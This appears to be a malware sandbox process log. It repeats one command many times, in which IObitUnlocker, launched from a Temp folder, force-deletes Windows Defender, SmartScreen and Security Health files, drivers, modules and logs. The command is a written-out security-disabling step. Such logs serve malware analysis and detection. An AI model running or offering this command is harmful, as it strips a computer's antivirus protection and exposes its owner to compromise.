C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5012
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:972
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:2420
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:1292
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:6104
-
-
